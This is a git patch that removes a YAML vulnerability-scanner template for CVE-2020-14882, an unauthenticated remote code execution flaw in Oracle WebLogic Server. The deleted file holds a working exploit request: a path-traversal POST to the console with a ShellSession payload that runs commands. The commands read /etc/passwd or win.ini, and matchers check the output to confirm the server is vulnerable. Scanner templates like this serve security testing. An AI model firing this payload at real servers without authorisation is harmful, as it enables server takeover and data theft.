From 73c94b174c05eae564a558453f3ca1d42da4032c Mon Sep 17 00:00:00 2001 From: bauthard <8293321+bauthard@users.noreply.github.com> Date: Sun, 1 Nov 2020 12:53:33 +0530 Subject: [PATCH] moved to another branch for the fix. --- cves/CVE-2020-14882.yaml | 41 ---------------------------------------- 1 file changed, 41 deletions(-) delete mode 100644 cves/CVE-2020-14882.yaml diff --git a/cves/CVE-2020-14882.yaml b/cves/CVE-2020-14882.yaml deleted file mode 100644 index 24fa548466..0000000000 --- a/cves/CVE-2020-14882.yaml +++ /dev/null @@ -1,41 +0,0 @@ -id: cve-2020-14882 - -info: - name: Oracle WebLogic Server Unauthenticated RCE - author: dwisiswant0 - severity: critical - description: | - Vulnerability in the Oracle WebLogic Server - product of Oracle Fusion Middleware (component: Console). - Supported versions that are affected are 10.3.6.0.0, - 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. - Easily exploitable vulnerability allows unauthenticated - attacker with network access via HTTP to compromise the server. - Successful attacks of this vulnerability can result in takeover. - - # References: - # - https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf - # - https://twitter.com/jas502n/status/1321416053050667009 - # - https://youtu.be/JFVDOIL0YtA - -requests: - - payloads: - command: - - "cat%20%2Fetc%2Fpasswd" - - "type%20C%3A%5CWindows%5Cwin.ini" - raw: - - | - POST /console/images/%252E%252E%252Fconsole.portal HTTP/1.1 - Host: {{Hostname}} - Connection: close - Content-Type: application/x-www-form-urlencoded; charset=utf-8 - - _nfpb=true&_pageLabel=&handle=http://com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27{{'command'}}%27);%22) - matchers: - - type: regex - regex: - - "root:[x*]:0:0:" - - "\\[(font|extension|file)s\\]" - - "=UnexpectedExceptionPage" - condition: or - part: body